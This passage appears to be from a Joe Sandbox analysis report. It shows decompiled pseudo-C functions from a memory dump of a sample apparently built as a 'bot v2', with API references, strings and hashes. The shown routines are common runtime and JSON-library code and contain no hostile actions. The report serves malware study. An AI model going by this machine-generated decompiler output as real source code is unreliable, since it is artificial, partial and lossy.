					} else {
						_t51 = E00436150(1, 0x364);
						_pop(_t43);
						__eflags = _t51;
						if(__eflags != 0) {
							__eflags = E00432FF4(__eflags,  *0x4c6260, _t51);
							if(__eflags != 0) {
								E0043212E(_t51, "hbL");
								E00432BD6(0);
								_t65 = _t65 + 0xc;
								goto L13;
							} else {
								_t39 = 0;
								E00432FF4(__eflags,  *0x4c6260, 0);
								_push(_t51);
								goto L9;
							}
						} else {
							_t39 = 0;
							__eflags = 0;
							E00432FF4(0,  *0x4c6260, 0);
							_push(0);
							L9:
							E00432BD6();
							_pop(_t43);
							goto L4;
						}
					}
				} else {
					_t51 = E00432FB5(_t67, _t2);
					if(_t51 == 0) {
						_t2 =  *0x4c6260; // 0x6
						goto L6;
					} else {
						if(_t51 != 0xffffffff) {
							L13:
							_t39 = _t51;
						} else {
							L3:
							_t39 = 0;
							L4:
							_t51 = _t39;
						}
					}
				}
				SetLastError(_t60);
				asm("sbb edi, edi");
				_t53 =  ~_t51 & _t39;
				if(_t53 == 0) {
					E0042972B(_t39, _t43, _t49, _t53, _t60);
					asm("int3");
					_t5 =  *0x4c6260; // 0x6
					_push(_t60);
					__eflags = _t5 - 0xffffffff;
					if(__eflags == 0) {
						L22:
						_t6 = E00432FF4(__eflags, _t5, 0xffffffff);
						__eflags = _t6;
						if(_t6 == 0) {
							goto L31;
						} else {
							_t60 = E00436150(1, 0x364);
							_pop(_t43);
							__eflags = _t60;
							if(__eflags != 0) {
								__eflags = E00432FF4(__eflags,  *0x4c6260, _t60);
								if(__eflags != 0) {
									E0043212E(_t60, "hbL");
									E00432BD6(0);
									_t65 = _t65 + 0xc;
									goto L29;
								} else {
									E00432FF4(__eflags,  *0x4c6260, _t21);
									_push(_t60);
									goto L25;
								}
							} else {
								E00432FF4(__eflags,  *0x4c6260, _t20);
								_push(_t60);
								L25:
								E00432BD6();
								_pop(_t43);
								goto L31;
							}
						}
					} else {
						_t60 = E00432FB5(__eflags, _t5);
						__eflags = _t60;
						if(__eflags == 0) {
							_t5 =  *0x4c6260; // 0x6
							goto L22;
						} else {
							__eflags = _t60 - 0xffffffff;
							if(_t60 == 0xffffffff) {
								L31:
								E0042972B(_t39, _t43, _t49, _t53, _t60);
								asm("int3");
								_push(_t39);
								_push(_t60);
								_push(_t53);
								_t61 = GetLastError();
								_t9 =  *0x4c6260; // 0x6
								__eflags = _t9 - 0xffffffff;
								if(__eflags == 0) {
									L38:
									_t10 = E00432FF4(__eflags, _t9, 0xffffffff);
									__eflags = _t10;
									if(_t10 == 0) {
										goto L35;
									} else {
										_t54 = E00436150(1, 0x364);
										__eflags = _t54;
										if(__eflags != 0) {
											__eflags = E00432FF4(__eflags,  *0x4c6260, _t54);
											if(__eflags != 0) {
												E0043212E(_t54, "hbL");
												E00432BD6(0);
												goto L45;
											} else {
												_t40 = 0;
												E00432FF4(__eflags,  *0x4c6260, 0);
												_push(_t54);
												goto L41;
											}
										} else {
											_t40 = 0;
											__eflags = 0;
											E00432FF4(0,  *0x4c6260, 0);
											_push(0);
											L41:
											E00432BD6();
											goto L36;
										}
									}
								} else {
									_t54 = E00432FB5(__eflags, _t9);
									__eflags = _t54;
									if(__eflags == 0) {
										_t9 =  *0x4c6260; // 0x6
										goto L38;
									} else {
										__eflags = _t54 - 0xffffffff;
										if(_t54 != 0xffffffff) {
											L45:
											_t40 = _t54;
										} else {
											L35:
											_t40 = 0;
											__eflags = 0;
											L36:
											_t54 = _t40;
										}
									}
								}
								SetLastError(_t61);
								asm("sbb edi, edi");
								_t56 =  ~_t54 & _t40;
								__eflags = _t56;
								return _t56;
							} else {
								L29:
								__eflags = _t60;
								if(_t60 == 0) {
									goto L31;
								} else {
									return _t60;
								}
							}
						}
					}
				} else {
					return _t53;
				}
			}

0x00432300
0x00432300
0x0043230b
0x0043230d
0x00432312
0x00432315
0x00432333
0x00432336
0x0043233b
0x0043233d
0x00000000
0x0043233f
0x0043234b
0x0043234e
0x0043234f
0x00432351
0x00432376
0x00432378
0x00432391
0x00432398
0x0043239d
0x00000000
0x0043237a
0x0043237a
0x00432383
0x00432388
0x00000000
0x00432388
0x00432353
0x00432353
0x00432353
0x0043235c
0x00432361
0x00432362
0x00432362
0x00432367
0x00000000
0x00432367
0x00432351
0x00432317
0x0043231d
0x00432321
0x0043232e
0x00000000
0x00432323
0x00432326
0x004323a0
0x004323a0
0x00432328
0x00432328
0x00432328
0x0043232a
0x0043232a
0x0043232a
0x00432326
0x00432321
0x004323a3
0x004323ab
0x004323ad
0x004323af
0x004323b7
0x004323bc
0x004323bd
0x004323c2
0x004323c3
0x004323c6
0x004323e0
0x004323e3
0x004323e8
0x004323ea
0x00000000
0x004323ec
0x004323f8
0x004323fb
0x004323fc
0x004323fe
0x00432421
0x00432423
0x0043243a
0x00432441
0x00432446
0x00000000
0x00432425
0x0043242c
0x00432431
0x00000000
0x00432431
0x00432400
0x00432407
0x0043240c
0x0043240d
0x0043240d
0x00432412
0x00000000
0x00432412
0x004323fe
0x004323c8
0x004323ce
0x004323d0
0x004323d2
0x004323db
0x00000000
0x004323d4
0x004323d4
0x004323d7
0x00432451
0x00432451
0x00432456
0x00432459
0x0043245a
0x0043245b
0x00432462
0x00432464
0x00432469
0x0043246c
0x0043248a
0x0043248d
0x00432492
0x00432494
0x00000000
0x00432496
0x004324a2
0x004324a6
0x004324a8
0x004324cd
0x004324cf
0x004324e8
0x004324ef
0x00000000
0x004324d1
0x004324d1
0x004324da
0x004324df
0x00000000
0x004324df
0x004324aa
0x004324aa
0x004324aa
0x004324b3
0x004324b8
0x004324b9
0x004324b9
0x00000000
0x004324be
0x004324a8
0x0043246e
0x00432474
0x00432476
0x00432478
0x00432485
0x00000000
0x0043247a
0x0043247a
0x0043247d
0x004324f7
0x004324f7
0x0043247f
0x0043247f
0x0043247f
0x0043247f
0x00432481
0x00432481
0x00432481
0x0043247d
0x00432478
0x004324fa
0x00432502
0x00432504
0x00432504
0x0043250b
0x004323d9
0x00432449
0x00432449
0x0043244b
0x00000000
0x0043244d
0x00432450
0x00432450
0x0043244b
0x004323d7
0x004323d2
0x004323b1
0x004323b6
0x004323b6

APIs

GetLastError.KERNEL32(?,?,?,00429774,00000003,00416557), ref: 00432305
_free.LIBCMT ref: 00432362
_free.LIBCMT ref: 00432398
SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00429774,00000003,00416557), ref: 004323A3

Strings

hbL, xrefs: 0043238B

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ErrorLast_free
String ID: hbL
API String ID: 2283115069-2435073812
Opcode ID: 9906fcf46d9cbada152aad094a42a2b9cedac3f2eeeca1f2d837a4172a4f5e5c
Instruction ID: 2aac5d7e24027fbf1b82f5012b80c9482be389ec8910aceac1d61e10b808497f
Opcode Fuzzy Hash: 9906fcf46d9cbada152aad094a42a2b9cedac3f2eeeca1f2d837a4172a4f5e5c
Instruction Fuzzy Hash: F311C6722086053BD6513B76AF81E2B7259BBCD379F25223FFA24922D1DDEC8C01621C

Uniqueness

Uniqueness Score: -1.00%

Function 00432457 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 85%

			E00432457(void* __ecx) {
				intOrPtr _t2;
				signed int _t3;
				signed int _t13;
				signed int _t18;
				long _t21;

				_t21 = GetLastError();
				_t2 =  *0x4c6260; // 0x6
				_t24 = _t2 - 0xffffffff;
				if(_t2 == 0xffffffff) {
					L6:
					_t3 = E00432FF4(__eflags, _t2, 0xffffffff);
					__eflags = _t3;
					if(_t3 == 0) {
						goto L3;
					} else {
						_t18 = E00436150(1, 0x364);
						__eflags = _t18;
						if(__eflags != 0) {
							__eflags = E00432FF4(__eflags,  *0x4c6260, _t18);
							if(__eflags != 0) {
								E0043212E(_t18, "hbL");
								E00432BD6(0);
								goto L13;
							} else {
								_t13 = 0;
								E00432FF4(__eflags,  *0x4c6260, 0);
								_push(_t18);
								goto L9;
							}
						} else {
							_t13 = 0;
							__eflags = 0;
							E00432FF4(0,  *0x4c6260, 0);
							_push(0);
							L9:
							E00432BD6();
							goto L4;
						}
					}
				} else {
					_t18 = E00432FB5(_t24, _t2);
					if(_t18 == 0) {
						_t2 =  *0x4c6260; // 0x6
						goto L6;
					} else {
						if(_t18 != 0xffffffff) {
							L13:
							_t13 = _t18;
						} else {
							L3:
							_t13 = 0;
							L4:
							_t18 = _t13;
						}
					}
				}
				SetLastError(_t21);
				asm("sbb edi, edi");
				return  ~_t18 & _t13;
			}

0x00432462
0x00432464
0x00432469
0x0043246c
0x0043248a
0x0043248d
0x00432492
0x00432494
0x00000000
0x00432496
0x004324a2
0x004324a6
0x004324a8
0x004324cd
0x004324cf
0x004324e8
0x004324ef
0x00000000
0x004324d1
0x004324d1
0x004324da
0x004324df
0x00000000
0x004324df
0x004324aa
0x004324aa
0x004324aa
0x004324b3
0x004324b8
0x004324b9
0x004324b9
0x00000000
0x004324be
0x004324a8
0x0043246e
0x00432474
0x00432478
0x00432485
0x00000000
0x0043247a
0x0043247d
0x004324f7
0x004324f7
0x0043247f
0x0043247f
0x0043247f
0x00432481
0x00432481
0x00432481
0x0043247d
0x00432478
0x004324fa
0x00432502
0x0043250b

APIs

GetLastError.KERNEL32(-00000004,?,0042976E,0042936E,00432BFC,?,?,00431C11), ref: 0043245C
_free.LIBCMT ref: 004324B9
_free.LIBCMT ref: 004324EF
SetLastError.KERNEL32(00000000,00000006,000000FF,?,0042976E,0042936E,00432BFC,?,?,00431C11), ref: 004324FA

Strings

hbL, xrefs: 004324E2

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ErrorLast_free
String ID: hbL
API String ID: 2283115069-2435073812
Opcode ID: ea0943ffbba9985f3d3ef8ec4591e2ce9bb0ae023e9a0425d4f2f8f858e4272c
Instruction ID: 4d93ff8769145384fceca2b73714efbf59fed9d52f01017c1394bd8c28f71115
Opcode Fuzzy Hash: ea0943ffbba9985f3d3ef8ec4591e2ce9bb0ae023e9a0425d4f2f8f858e4272c
Instruction Fuzzy Hash: 0E1106322086013AD6503B7A6F81D273559B7DC378F21123BF624822D1DDED8C01621C

Uniqueness

Uniqueness Score: -1.00%

Function 00430CAE Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 64
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 61%

			E00430CAE(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				void _v1160;
				long _v1164;
				signed int _t12;
				intOrPtr _t17;
				intOrPtr _t23;
				void* _t24;
				intOrPtr* _t27;
				void* _t30;
				intOrPtr _t32;
				void* _t33;
				void* _t36;
				void* _t37;
				signed int _t41;

				_t39 = _t41;
				_t12 =  *0x4c61a4; // 0x8656a166
				_v8 = _t12 ^ _t41;
				_push(__ebx);
				_t23 = _a8;
				_push(__esi);
				_push(__edi);
				_t32 = _a4;
				_t36 = GetStdHandle(0xfffffff4);
				if(_t36 == 0xffffffff || _t36 == 0 || GetFileType(_t36) != 2 || swprintf( &_v1160, 0x240, L"Assertion failed: %Ts, file %Ts, line %d\n", _t32, _t23, _a12) < 0) {
					L7:
					_pop(_t33);
					_pop(_t37);
					_pop(_t24);
					return E00424900(_t14, _t24, _v8 ^ _t39, _t30, _t33, _t37);
				} else {
					_t27 =  &_v1160;
					_t30 = _t27 + 2;
					do {
						_t17 =  *_t27;
						_t27 = _t27 + 2;
					} while (_t17 != 0);
					_v1164 = 0;
					_t29 = _t27 - _t30 >> 1;
					if(WriteConsoleW(_t36,  &_v1160, _t27 - _t30 >> 1,  &_v1164, 0) != 0) {
						E0042972B(_t23, _t29, _t30, 0, _t36);
						asm("int3");
						return L"Assertion failed: %Ts, file %Ts, line %d\n";
					} else {
						goto L7;
					}
				}
			}

0x00430cb1
0x00430cb9
0x00430cc0
0x00430cc3
0x00430cc4
0x00430cc7
0x00430cc8
0x00430cc9
0x00430cd4
0x00430cd9
0x00430d48
0x00430d4b
0x00430d4c
0x00430d4f
0x00430d56
0x00430d0d
0x00430d0d
0x00430d15
0x00430d18
0x00430d18
0x00430d1b
0x00430d1e
0x00430d26
0x00430d32
0x00430d46
0x00430d57
0x00430d5c
0x00430d62
0x00000000
0x00000000
0x00000000
0x00430d46

APIs

GetStdHandle.KERNEL32(000000F4,?,000044B5), ref: 00430CCE
GetFileType.KERNEL32(00000000,?,000044B5), ref: 00430CE0
swprintf.LIBCMT ref: 00430D01
WriteConsoleW.KERNEL32(00000000,?,?,?,00000000,?,?,?,?,000044B5), ref: 00430D3E

Strings

Assertion failed: %Ts, file %Ts, line %d, xrefs: 00430CF6

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: ConsoleFileHandleTypeWriteswprintf
String ID: Assertion failed: %Ts, file %Ts, line %d
API String ID: 2943507729-1719349581
Opcode ID: d3446b5b5de2ca4e97d201019632cc36612a68cbfb1a9167925305758f440612
Instruction ID: 4c26970f0eb0730b92b7f4c736a760fcb86d6108d956c7dea7fbdc41bef41a34
Opcode Fuzzy Hash: d3446b5b5de2ca4e97d201019632cc36612a68cbfb1a9167925305758f440612
Instruction Fuzzy Hash: 9D113475500118ABCB249F69EC44EEF73ACDF89310F60465AFA2997181DE34AD418B6C

Uniqueness

Uniqueness Score: -1.00%

Function 00428E42 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 63
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00428E42(void* __ecx, signed int* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				signed int _t11;
				WCHAR* _t12;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				signed int* _t22;
				signed int* _t26;
				struct HINSTANCE__* _t29;
				WCHAR* _t31;
				void* _t32;

				_t26 = _a4;
				while(_t26 != _a8) {
					_t11 =  *_t26;
					_t22 = 0x4c7174 + _t11 * 4;
					_t29 =  *_t22;
					if(_t29 == 0) {
						_t12 =  *(0x4438a8 + _t11 * 4);
						_v8 = _t12;
						_t29 = LoadLibraryExW(_t12, 0, 0x800);
						if(_t29 != 0) {
							L13:
							 *_t22 = _t29;
							if( *_t22 != 0) {
								FreeLibrary(_t29);
							}
							L15:
							_t16 = _t29;
							L12:
							return _t16;
						}
						_t18 = GetLastError();
						if(_t18 != 0x57) {
							L8:
							 *_t22 = _t18 | 0xffffffff;
							L9:
							_t26 =  &(_t26[1]);
							continue;
						}
						_t31 = _v8;
						_t18 = E00431F88(_t31, L"api-ms-", 7);
						_t32 = _t32 + 0xc;
						if(_t18 == 0) {
							goto L8;
						}
						_t18 = LoadLibraryExW(_t31, 0, 0);
						_t29 = _t18;
						if(_t29 != 0) {
							goto L13;
						}
						goto L8;
					}
					if(_t29 != 0xffffffff) {
						goto L15;
					}
					goto L9;
				}
				_t16 = 0;
				goto L12;
			}

0x00428e49
0x00428ebe
0x00428e4e
0x00428e50
0x00428e57
0x00428e5c
0x00428e65
0x00428e74
0x00428e7d
0x00428e81
0x00428eca
0x00428ecc
0x00428ed0
0x00428ed3
0x00428ed3
0x00428ed9
0x00428ed9
0x00428ec5
0x00428ec9
0x00428ec9
0x00428e83
0x00428e8c
0x00428eb6
0x00428eb9
0x00428ebb
0x00428ebb
0x00000000
0x00428ebb
0x00428e8e
0x00428e99
0x00428e9e
0x00428ea3
0x00000000
0x00000000
0x00428eaa
0x00428eb0
0x00428eb4
0x00000000
0x00000000
0x00000000
0x00428eb4
0x00428e61
0x00000000
0x00000000
0x00000000
0x00428e63
0x00428ec3
0x00000000

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,00428F05,?,?,004C711C,00000000,?,00429030,00000004,InitializeCriticalSectionEx,0044399C,InitializeCriticalSectionEx,00000000), ref: 00428ED3

Strings

api-ms-, xrefs: 00428E93

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 8e94cfd00465ddf95ed80f7974803322f69f09ef0c60497a8b4a98b53e73cddc
Instruction ID: 1b2d96611322c8d965842d7b5f3b5c6d43c2374c88562c16981593ce7ee255c5
Opcode Fuzzy Hash: 8e94cfd00465ddf95ed80f7974803322f69f09ef0c60497a8b4a98b53e73cddc
Instruction Fuzzy Hash: BA11E771F02635ABCB219B58BC4075F73A4AF12771F660126EA11E7380DB74ED0086DD

Uniqueness

Uniqueness Score: -1.00%

Function 00421390 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E00421390(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				char _v32;
				char _v56;
				char _v80;
				char _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				signed int _t19;
				signed int _t50;

				_t19 =  *0x4c61a4; // 0x8656a166
				_v8 = _t19 ^ _t50;
				_v108 = E00424430( &_v104, _a12);
				_v112 = E00406240(__eflags,  &_v56, E00406350(__eflags,  &_v80, "[json.exception.", _a8), 0x4408c4);
				E00406240(__eflags, _a4, E004061F0( &_v32,  &_v32, _v112, _v108), 0x4408c0);
				E00416980( &_v32);
				E00416980( &_v56);
				E00416980( &_v80);
				E00416980( &_v104);
				return E00424900(_a4, __ebx, _v8 ^ _t50, _a4, __edi, __esi);
			}

0x00421396
0x0042139d
0x004213b0
0x004213da
0x004213fb
0x00421406
0x0042140e
0x00421416
0x0042141e
0x00421433

APIs

Part of subcall function 00406350: char_traits.LIBCPMTD ref: 0040635A

task.LIBCPMTD ref: 00421406
task.LIBCPMTD ref: 0042140E
task.LIBCPMTD ref: 00421416
task.LIBCPMTD ref: 0042141E

Strings

[json.exception., xrefs: 004213BC

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: task$char_traits
String ID: [json.exception.
API String ID: 1455298312-791563284
Opcode ID: a4f2646b88bf0533ee4fa91e3672b49bfe9fcfb734d342e94794e4e775873d33
Instruction ID: 93d958e428c0ed81e26a1889f0ca6a4e17b3b8d78de8c0c7c04aacfead8e47ff
Opcode Fuzzy Hash: a4f2646b88bf0533ee4fa91e3672b49bfe9fcfb734d342e94794e4e775873d33
Instruction Fuzzy Hash: 6B1124B1D1020CABCB04FFA1ED52CEEB77C9F54304F51452EF90967142EA39AA58CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00437701 Relevance: 7.5, APIs: 5, Instructions: 40
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00437701(intOrPtr* _a4) {
				intOrPtr _t6;
				intOrPtr* _t21;
				void* _t23;
				void* _t24;
				void* _t25;
				void* _t26;
				void* _t27;

				_t21 = _a4;
				if(_t21 != 0) {
					_t23 =  *_t21 -  *0x4c6208; // 0x4c6258
					if(_t23 != 0) {
						E00432BD6(_t7);
					}
					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x4c620c; // 0x4c71a1
					if(_t24 != 0) {
						E00432BD6(_t8);
					}
					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x4c6210; // 0x4c71a1
					if(_t25 != 0) {
						E00432BD6(_t9);
					}
					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x4c6238; // 0x4c625c
					if(_t26 != 0) {
						E00432BD6(_t10);
					}
					_t6 =  *((intOrPtr*)(_t21 + 0x34));
					_t27 = _t6 -  *0x4c623c; // 0x4c71a4
					if(_t27 != 0) {
						return E00432BD6(_t6);
					}
				}
				return _t6;
			}

0x00437707
0x0043770c
0x00437710
0x00437716
0x00437719
0x0043771e
0x00437722
0x00437728
0x0043772b
0x00437730
0x00437734
0x0043773a
0x0043773d
0x00437742
0x00437746
0x0043774c
0x0043774f
0x00437754
0x00437755
0x00437758
0x0043775e
0x00000000
0x00437766
0x0043775e
0x00437769

APIs

_free.LIBCMT ref: 00437719

Part of subcall function 00432BD6: RtlFreeHeap.NTDLL(00000000,00000000,?,00431C11), ref: 00432BEC
Part of subcall function 00432BD6: GetLastError.KERNEL32(?,?,00431C11), ref: 00432BFE

_free.LIBCMT ref: 0043772B
_free.LIBCMT ref: 0043773D
_free.LIBCMT ref: 0043774F
_free.LIBCMT ref: 00437761

Memory Dump Source

Source File: 0000000E.00000002.543498747.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.543471550.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543529684.0000000000440000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543540251.000000000044B000.00000004.00000400.00020000.00000000.sdmpDownload File
Associated: 0000000E.00000002.543603713.00000000004C8000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_AppLaunch.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c60e07aeb52e4c6e54fcf22b9cf27b01f2baeb71ab358cfd117825d2bc1c7b29
Instruction ID: 5fe2a7200c81b7c5fec0d5994aed50808e120df4189dc943661aa2eac2d14a38
Opcode Fuzzy Hash: c60e07aeb52e4c6e54fcf22b9cf27b01f2baeb71ab358cfd117825d2bc1c7b29
Instruction Fuzzy Hash: EAF04F72508200A78670FF59F9C5C5BB3D9BA08750F656C5AF084D7B51CB78FC808A5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041D66A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 300
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0041D66A(void* __ebx, void* __edi, void* __esi) {
				signed char _t163;
				signed char _t165;
				void* _t171;
				void* _t185;
				signed char _t191;
				void* _t230;
				void* _t338;
				void* _t339;
				void* _t340;

				_t339 = __esi;
				_t338 = __edi;
				_t230 = __ebx;
				if((E0041ED90( *((intOrPtr*)( *((intOrPtr*)(_t340 + 8)) + 8))) & 0x000000ff) == 0) {
					__eflags =  *(_t340 + 0xc) & 0x000000ff;
					if(( *(_t340 + 0xc) & 0x000000ff) == 0) {
						 *((intOrPtr*)(_t340 - 0xa4)) = E004061D0( *((intOrPtr*)(_t340 - 4)));
						 *((intOrPtr*)(_t340 - 0x1c8)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t340 - 0xa4))))));
						 *((intOrPtr*)(_t340 - 0x1c8))(0x5b);
						 *((intOrPtr*)(_t340 - 0x1cc)) =  *((intOrPtr*)( *((intOrPtr*)(_t340 + 8)) + 8));
						E0041B070( *((intOrPtr*)(_t340 - 0x1cc)), _t340 - 0x24);
						while(1) {
							 *((intOrPtr*)(_t340 - 0x1d0)) =  *((intOrPtr*)( *((intOrPtr*)(_t340 + 8)) + 8));
							 *((intOrPtr*)(_t340 - 0x1d4)) = E0041B0B0( *((intOrPtr*)(_t340 - 0x1d0)), _t340 - 0x280);
							_t163 = E00417100(_t340 - 0x24, E004179C0( *((intOrPtr*)(_t340 - 0x1d4)), _t340 - 0x284, 1));
							__eflags = _t163 & 0x000000ff;
							if((_t163 & 0x000000ff) == 0) {
								break;
							}
							E0041CFC0(_t230,  *((intOrPtr*)(_t340 - 4)), _t338, _t339, E00417420(_t340 - 0x24), 0,  *(_t340 + 0x10) & 0x000000ff,  *((intOrPtr*)(_t340 + 0x14)),  *((intOrPtr*)(_t340 + 0x18)));
							 *((intOrPtr*)(_t340 - 0xa8)) = E004061D0( *((intOrPtr*)(_t340 - 4)));
							 *((intOrPtr*)(_t340 - 0x1d8)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t340 - 0xa8))))));
							 *((intOrPtr*)(_t340 - 0x1d8))(0x2c);
							E00417700(_t340 - 0x24);
						}
						_t165 = E0041ED90( *((intOrPtr*)( *((intOrPtr*)(_t340 + 8)) + 8)));
						_t318 = _t165 & 0x000000ff;
						__eflags = _t165 & 0x000000ff;
						if(__eflags != 0) {
							_push(0x3fa5);
							E00430DB7(_t230, _t318, _t338, _t339, __eflags, L"!val.m_value.array->empty()", L"C:\\Users\\root\\Desktop\\bot v2\\json.hpp");
						}
						E0041CFC0(_t230,  *((intOrPtr*)(_t340 - 4)), _t338, _t339, E0041AC90( *((intOrPtr*)( *((intOrPtr*)(_t340 + 8)) + 8))), 0,  *(_t340 + 0x10) & 0x000000ff,  *((intOrPtr*)(_t340 + 0x14)),  *((intOrPtr*)(_t340 + 0x18)));
						 *((intOrPtr*)(_t340 - 0xac)) = E004061D0( *((intOrPtr*)(_t340 - 4)));
						 *((intOrPtr*)(_t340 - 0x1dc)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t340 - 0xac))))));
						_t171 =  *((intOrPtr*)(_t340 - 0x1dc))(0x5d);
					} else {
						 *((intOrPtr*)(_t340 - 0x88)) = E004061D0( *((intOrPtr*)(_t340 - 4)));
						 *((intOrPtr*)(_t340 - 0x190)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t340 - 0x88)))) + 4));
						 *((intOrPtr*)(_t340 - 0x190))("[\n", 2);
						 *((intOrPtr*)(_t340 - 0x14)) =  *((intOrPtr*)(_t340 + 0x18)) +  *((intOrPtr*)(_t340 + 0x14));
						_t185 = E00420EE0( *((intOrPtr*)(_t340 - 4)) + 0x250);
						__eflags = _t185 -  *((intOrPtr*)(_t340 - 0x14));
						if(_t185 <  *((intOrPtr*)(_t340 - 0x14))) {
							 *((intOrPtr*)(_t340 - 0x194)) =  *((intOrPtr*)(_t340 - 4)) + 0x250;
							__eflags = E00420EE0( *((intOrPtr*)(_t340 - 4)) + 0x250) << 1;
							E00422470( *((intOrPtr*)(_t340 - 0x194)), E00420EE0( *((intOrPtr*)(_t340 - 4)) + 0x250) << 1, 0x20);
						}
						 *((intOrPtr*)(_t340 - 0x198)) =  *((intOrPtr*)( *((intOrPtr*)(_t340 + 8)) + 8));
						E0041B070( *((intOrPtr*)(_t340 - 0x198)), _t340 - 0x20);
						while(1) {
							 *((intOrPtr*)(_t340 - 0x19c)) =  *((intOrPtr*)( *((intOrPtr*)(_t340 + 8)) + 8));
							 *((intOrPtr*)(_t340 - 0x1a0)) = E0041B0B0( *((intOrPtr*)(_t340 - 0x19c)), _t340 - 0x278);
							_t326 = _t340 - 0x27c;
							_t191 = E00417100(_t340 - 0x20, E004179C0( *((intOrPtr*)(_t340 - 0x1a0)), _t340 - 0x27c, 1));
							__eflags = _t191 & 0x000000ff;
							if((_t191 & 0x000000ff) == 0) {
								break;
							}
							 *((intOrPtr*)(_t340 - 0x8c)) = E004061D0( *((intOrPtr*)(_t340 - 4)));
							 *((intOrPtr*)(_t340 - 0x1a8)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t340 - 0x8c)))) + 4));
